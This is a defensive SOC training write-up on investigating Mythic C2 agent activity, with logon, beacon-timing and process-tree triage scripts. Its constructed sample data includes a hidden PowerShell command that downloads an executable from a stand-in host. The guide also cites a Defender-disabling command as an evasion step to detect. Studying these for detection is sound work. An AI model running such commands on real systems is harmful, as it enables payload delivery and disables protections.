SOC Challenge/Day 28-Investigate Mythic Agent Activity

D28 - Investigate Mythic Agent Activity

1. Introduction

1.1 What is this guide about?

This guide provides a methodology for investigating malicious activity associated with Mythic agents. Mythic is an open-source, multi-agent Command and Control (C2) framework used by red teams and, at times, by real attackers for post-exploitation operations. The goal is to help analysts trace the steps an attacker takes after gaining access to a system, map out the attack chain, and identify key indicators of compromise (IOCs).

1.2 What does this guide try to solve or mitigate?

  • Understand Attacker Techniques: By following the attack flow (Initial Access, Discovery, Defense Evasion, etc.), analysts can reconstruct the sequence of events.
  • Improve Detection and Response: Identifying malicious processes, connections, and system changes helps mitigate further damage.
  • Guide Incident Investigation: This framework encourages thorough documentation and log analysis, ensuring all relevant data is captured for reporting.

1.3 What caused the need for this guide?

  • Sophisticated Threats: The use of C2 frameworks like Mythic by attackers requires specialized investigation methodologies.
  • Lateral Movement and Data Exfiltration Risks: Without prompt detection, attackers can move laterally through networks and steal data.
  • Need for Practical Training: Building investigation skills requires structured approaches like this guide, which can also be enhanced through platforms such as TryHackMe and HackTheBox.

2. Investigation Framework Based on the Attack Diagram

The following methodology was derived from the attack diagram supplied with the challenge. It provides a structured approach to guide log investigation for each phase of the attack lifecycle.

2.1 Initial Access

  • Objective: Identify logs showing the attacker's initial access to the system.
  • Query:
    • event.code: 4624 AND user.name: "<account>" (Windows Security event 4624 is a successful logon; replace <account> with the account under investigation, since user.name on its own, without a value, only tests that the field exists). Where the dashboard exposes the logon type, filter on it as well: type 3 is a network logon, type 10 is an RDP session.
  • Action:
    • Check for successful logons in the dashboard. Exclude machine accounts (names ending in $) and look for the first logon of an account from a source address it has not used before.
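The triage described in this phase, as an added example that is not part of the original write-up or the challenge material. The records are constructed, and the field names (winlogbeat/ECS style, with the numeric logon type assumed to sit in winlog.event_data.LogonType) are an assumption about the reader's ingest pipeline:

```python
"""Triage of Windows Security event 4624 (successful logon) records.

Added example for this write-up, not code from the challenge. The records
are constructed dictionaries with winlogbeat/ECS-style field names; the
mapping of LogonType to winlog.event_data.LogonType is assumed.
"""
from collections import defaultdict

# Logon types worth a first look in the initial-access phase; 4 (batch),
# 5 (service) and 7 (unlock) are usually background noise.
LOGON_TYPES = {"2": "interactive", "3": "network", "10": "remote interactive (RDP)"}

# Constructed sample, not real data. The last record is a 4672 (special
# privileges assigned) that shares the logon details and must be ignored.
SAMPLE_EVENTS = [
    {"@timestamp": "2024-05-01T08:02:11Z", "event.code": "4624", "user.name": "WEB01$",
     "winlog.event_data.LogonType": "3", "source.ip": "10.0.0.5"},
    {"@timestamp": "2024-05-01T08:15:40Z", "event.code": "4624", "user.name": "j.doe",
     "winlog.event_data.LogonType": "2", "source.ip": "127.0.0.1"},
    {"@timestamp": "2024-05-01T09:03:12Z", "event.code": "4624", "user.name": "svc_backup",
     "winlog.event_data.LogonType": "3", "source.ip": "10.0.0.20"},
    {"@timestamp": "2024-05-01T22:47:03Z", "event.code": "4624", "user.name": "svc_backup",
     "winlog.event_data.LogonType": "10", "source.ip": "203.0.113.77"},
    {"@timestamp": "2024-05-01T22:47:03Z", "event.code": "4672", "user.name": "svc_backup",
     "winlog.event_data.LogonType": "10", "source.ip": "203.0.113.77"},
]

# Constructed baseline: source addresses each account has used before.
BASELINE = {"j.doe": {"127.0.0.1"}, "svc_backup": {"10.0.0.20"}}


def kql_for_account(account):
    """The dashboard query with the account value filled in."""
    return f'event.code: 4624 AND user.name: "{account}"'


def is_machine_account(name):
    return name.endswith("$")


def successful_logons(events):
    """Keep only 4624 records of interesting logon types from human/service accounts."""
    return [e for e in events
            if e.get("event.code") == "4624"
            and e.get("winlog.event_data.LogonType") in LOGON_TYPES
            and not is_machine_account(e.get("user.name", ""))]


def first_seen_sources(events, baseline):
    """Flag logons whose (account, source IP) pair has not been seen before.

    Returns a list of (timestamp, account, logon type label, source ip) in
    time order; a flagged source is added to the baseline so it is reported once.
    """
    seen = defaultdict(set, {k: set(v) for k, v in baseline.items()})
    flagged = []
    for e in sorted(successful_logons(events), key=lambda e: e["@timestamp"]):
        acct, src = e["user.name"], e["source.ip"]
        if src not in seen[acct]:
            flagged.append((e["@timestamp"], acct,
                            LOGON_TYPES[e["winlog.event_data.LogonType"]], src))
            seen[acct].add(src)
    return flagged


if __name__ == "__main__":
    print(kql_for_account("svc_backup"))
    for row in first_seen_sources(SAMPLE_EVENTS, BASELINE):
        print("first-seen logon:", *row)
```

The machine account and the 4672 record drop out, the two baseline logons are silent, and the one RDP logon from an address never used by svc_backup is what remains for the analyst to look at.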

2.2 Discovery

  • Objective: Identify commands executed to gather information about the system or network.
  • Action:
    • Look for PowerShell or CMD commands used for system and network reconnaissance in process-creation logs (Sysmon event 1, or Security event 4688 with command-line auditing enabled), for example whoami, systeminfo, ipconfig /all, net user, net group, nltest and quser.
    • Identify the server and time window where the attacker was active, and focus log review on this period.

2.3 Defense Evasion

  • Objective: Identify attempts to disable or weaken security tools.
  • Queries:
    • Changes to Windows Defender settings or disabling real-time protection, from the Microsoft-Windows-Windows Defender/Operational channel:
      • event.code: (5001 OR 5006 OR 5007)
    • The parentheses matter: written as event.code: 5001 OR 5006 OR 5007, only the first term is bound to event.code and the other two match any field. Event 5001 is "real-time protection disabled" and 5007 is "configuration has changed". Corroborate with process-creation logs showing the change itself, such as a PowerShell command line containing Set-MpPreference -DisableRealtimeMonitoring.

2.4 Execution

  • Objective: Identify actions taken to download and run agents on the compromised server.
  • Queries:
    • Outbound network connection to the C2 server (Sysmon event 3, network connection):
      • event.code: 3 AND initiated: true (the field that carries Sysmon's Initiated flag depends on the ingest pipeline; check the mapping before relying on the name)
    • Command execution using PowerShell, CMD, or a browser:
      • event.code: 29 (Sysmon FileExecutableDetected, available from Sysmon 14) for executable files written to disk, alongside event.code: 1 (process creation) for the command line that launched them.
    • Event IDs are only unique within a channel, so scope these queries to the Sysmon channel (for example winlog.channel: "Microsoft-Windows-Sysmon/Operational").
  • Process Tracking:
    • If the ProcessGuid is available, pivot on it and on ParentProcessGuid to trace parent and child processes and visualize the process flow.

2.5 C2 Connection

  • Objective: Identify and analyze connections to the Mythic C2 server.
  • Queries:
    • Network connection logs from the suspected agent process to the C2 server and port:
      • event.code: 3 AND the ProcessGuid of the agent (the same GUID seen in its process-creation event), optionally narrowed by destination IP and port
  • Action:
    • Confirm regular communication between the compromised machine and the Mythic C2 server. Agent check-ins repeat at a configured interval, often with jitter, so sort the connections by time and inspect the gaps between them; near-constant gaps distinguish a beacon from user-driven traffic.
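The check-in regularity test described above, as an added example that is not part of the original write-up and not Mythic's own code. The events are constructed; the field names follow the winlogbeat Sysmon mapping (event.code "3", destination.ip, destination.port, process.entity_id for ProcessGuid), which is an assumption about the reader's pipeline:

```python
"""Beacon-interval analysis over Sysmon event 3 (network connection) records.

Added example for this write-up, not code from the challenge or from Mythic.
Events are constructed; field names follow the winlogbeat Sysmon mapping
(assumed): event.code "3", destination.ip, destination.port, process.entity_id.
"""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, pstdev


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def make_conn(ts, dst, port, guid):
    return {"@timestamp": ts, "event.code": "3", "destination.ip": dst,
            "destination.port": port, "process.entity_id": guid}


AGENT_GUID = "{A1B2C3D4-0000-0000-0000-000000000001}"    # constructed ProcessGuid
BROWSER_GUID = "{A1B2C3D4-0000-0000-0000-000000000002}"  # constructed ProcessGuid

# Constructed sample: an agent checking in roughly every 60 s with about 10 %
# jitter, plus a browser talking to a web site at irregular times.
SAMPLE_EVENTS = (
    [make_conn(f"2024-05-01T10:{m:02d}:{s:02d}Z", "203.0.113.50", 8443, AGENT_GUID)
     for m, s in [(0, 0), (1, 3), (1, 58), (3, 5), (4, 1), (5, 0), (6, 4), (6, 57)]]
    + [make_conn(t, "198.51.100.9", 443, BROWSER_GUID)
       for t in ["2024-05-01T10:00:00Z", "2024-05-01T10:00:05Z",
                 "2024-05-01T10:12:30Z", "2024-05-01T10:12:31Z"]]
)


def group_key(e):
    return (e["destination.ip"], e["destination.port"], e["process.entity_id"])


def intervals(events, key):
    """Inter-arrival gaps in seconds for the event-3 records matching key."""
    ts = sorted(parse_ts(e["@timestamp"]) for e in events
                if e.get("event.code") == "3" and group_key(e) == key)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def coefficient_of_variation(gaps):
    """pstdev / mean of the gaps. Near 0: fixed sleep. Small: sleep plus jitter
    (Mythic agents expose both a callback interval and a jitter setting).
    Large: human-driven traffic. None when there are too few gaps to judge."""
    if len(gaps) < 3:
        return None
    m = mean(gaps)
    return pstdev(gaps) / m if m > 0 else None


def beacon_candidates(events, max_cv=0.3, min_conns=5):
    """Group event-3 records by (destination, port, ProcessGuid) and return the
    groups whose timing is regular enough to look like beaconing."""
    counts = defaultdict(int)
    for e in events:
        if e.get("event.code") == "3":
            counts[group_key(e)] += 1
    out = []
    for key, n in counts.items():
        if n < min_conns:
            continue
        gaps = intervals(events, key)
        cv = coefficient_of_variation(gaps)
        if cv is not None and cv <= max_cv:
            out.append({"destination": f"{key[0]}:{key[1]}", "process_guid": key[2],
                        "connections": n, "mean_gap_s": round(mean(gaps), 1),
                        "cv": round(cv, 3)})
    return out


if __name__ == "__main__":
    for c in beacon_candidates(SAMPLE_EVENTS):
        print("beacon candidate:", c)
```

The thresholds are starting points, not rules: a long sleep with heavy jitter will score higher than 0.3, and a browser polling an API can score low, so treat a hit as a pivot into the process-creation logs rather than a verdict.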

2.6 Exfiltration

  • Objective: Identify data exfiltration attempts.
  • Requirements:
    • Network-level evidence such as firewall, proxy or packet-capture logs; endpoint event logs show that a connection happened but not how much data left over it.
  • Note:
    • This phase rewards thorough analysis: follow each lead (a suspicious IP, an unusual port, a process that has no business talking to the internet) back through the earlier phases to piece together the full picture of the attack.

2.7 Example Investigation: Suspicious IP Activity

  • Scenario:
    • A suspicious IP is observed making connections on an unusual port.
  • Action:
    • Take the ProcessGuid from the network-connection event and find the matching process-creation event (Sysmon event 1). Its Image and CommandLine fields describe the process that made the connection, while ParentImage, ParentProcessGuid and ParentCommandLine describe what launched it. Sysmon has no separate "ChildProcess" field: children are found by searching for process-creation events whose ParentProcessGuid equals the GUID in hand.
    • Chain these lookups to visualize the event flow and determine:
      • Which program was launched and what subsequent processes were executed.
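The ProcessGuid pivot used in the Execution phase and in the example above, as an added example that is not part of the original write-up or the challenge. The events are constructed; the field names follow the winlogbeat Sysmon mapping (ProcessGuid to process.entity_id, ParentProcessGuid to process.parent.entity_id, Image to process.executable, CommandLine to process.command_line), which is an assumption about the reader's pipeline:

```python
"""Rebuild the process chain around a suspicious network connection from
Sysmon event 1 (process create) and event 3 (network connection) records.

Added example for this write-up, not code from the challenge. Records are
constructed; field names follow the winlogbeat Sysmon mapping (assumed).
"""
from collections import defaultdict, deque


def proc(guid, parent, image, cmd, ts):
    return {"@timestamp": ts, "event.code": "1", "process.entity_id": guid,
            "process.parent.entity_id": parent, "process.executable": image,
            "process.command_line": cmd}


def conn(guid, dst, port, ts):
    return {"@timestamp": ts, "event.code": "3", "process.entity_id": guid,
            "destination.ip": dst, "destination.port": port}


def guid(n):
    """Constructed ProcessGuid values, not from any real host."""
    return f"{{7B3F0000-0000-0000-0000-{n:012d}}}"


# Constructed sample: a browser session, a PowerShell download of a binary
# into C:\Users\Public, the binary calling back on 8443 and spawning recon.
SAMPLE_EVENTS = [
    proc(guid(1), None, r"C:\Windows\explorer.exe", "explorer.exe", "2024-05-01T09:00:00Z"),
    proc(guid(2), guid(1), r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
         "msedge.exe", "2024-05-01T09:05:00Z"),
    proc(guid(3), guid(1), r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         'powershell.exe -w hidden -c "iwr http://203.0.113.50/update.exe '
         r'-OutFile C:\Users\Public\update.exe"', "2024-05-01T09:58:10Z"),
    proc(guid(4), guid(3), r"C:\Users\Public\update.exe", "update.exe", "2024-05-01T09:58:40Z"),
    proc(guid(5), guid(4), r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami /all", "2024-05-01T09:59:05Z"),
    proc(guid(6), guid(4), r"C:\Windows\System32\cmd.exe", "cmd.exe /c net user", "2024-05-01T09:59:20Z"),
    conn(guid(2), "198.51.100.9", 443, "2024-05-01T09:05:02Z"),
    conn(guid(3), "203.0.113.50", 80, "2024-05-01T09:58:12Z"),
    conn(guid(4), "203.0.113.50", 8443, "2024-05-01T09:58:45Z"),
]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def index_processes(events):
    """ProcessGuid -> process-creation record."""
    return {e["process.entity_id"]: e for e in events if e.get("event.code") == "1"}


def pivots_for_connection(events, dst_ip, dst_port):
    """ProcessGuids that connected to dst_ip:dst_port (Sysmon event 3)."""
    return sorted({e["process.entity_id"] for e in events
                   if e.get("event.code") == "3"
                   and e["destination.ip"] == dst_ip and e["destination.port"] == dst_port})


def ancestry(start_guid, procs):
    """Chain from the root down to start_guid, following ParentProcessGuid.
    Stops at a parent with no creation event or if a loop is detected."""
    chain, seen, g = [], set(), start_guid
    while g in procs and g not in seen:
        seen.add(g)
        chain.append(procs[g])
        g = procs[g]["process.parent.entity_id"]
    return chain[::-1]


def descendants(start_guid, procs):
    """Every process spawned, directly or indirectly, by start_guid (breadth-first)."""
    children = defaultdict(list)
    for p in procs.values():
        children[p["process.parent.entity_id"]].append(p["process.entity_id"])
    out, queue = [], deque(children[start_guid])
    while queue:
        g = queue.popleft()
        out.append(procs[g])
        queue.extend(children[g])
    return out


if __name__ == "__main__":
    procs = index_processes(SAMPLE_EVENTS)
    for g in pivots_for_connection(SAMPLE_EVENTS, "203.0.113.50", 8443):
        print(" -> ".join(basename(p["process.executable"]) for p in ancestry(g, procs)))
        for p in descendants(g, procs):
            print("   child:", p["process.command_line"])
```

Walking up from the connecting process shows how the binary got onto the host; walking down shows the discovery commands the agent ran, which feeds straight back into the Discovery and Execution phases.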

2.8 Building the Puzzle One Piece at a Time

  • Approach:
    • Investigating suspicious activity is like assembling a puzzle. Each piece of information leads to the next clue, building towards a complete picture of the attack.
  • Current Progress:
    • I am still at the beginning stages of understanding this investigation process, but I am gaining clarity on the logic behind it.
  • Next Steps:
    • As I continue learning on hands-on platforms like TryHackMe and HackTheBox, my skills will improve and I will become more proficient at applying these investigation methods.

3. Conclusion

  • We explored the different phases of a Mythic Agent attack, focusing on initial access, discovery, execution, C2 communication, and exfiltration.
  • A structured methodology helps us investigate, document, and understand the attack flow.
  • Outlook:
    • With further practice and experience, especially through online training platforms, I aim to become familiar with threat hunting methodology, adapt it to my needs, and build confidence in conducting these investigations effectively.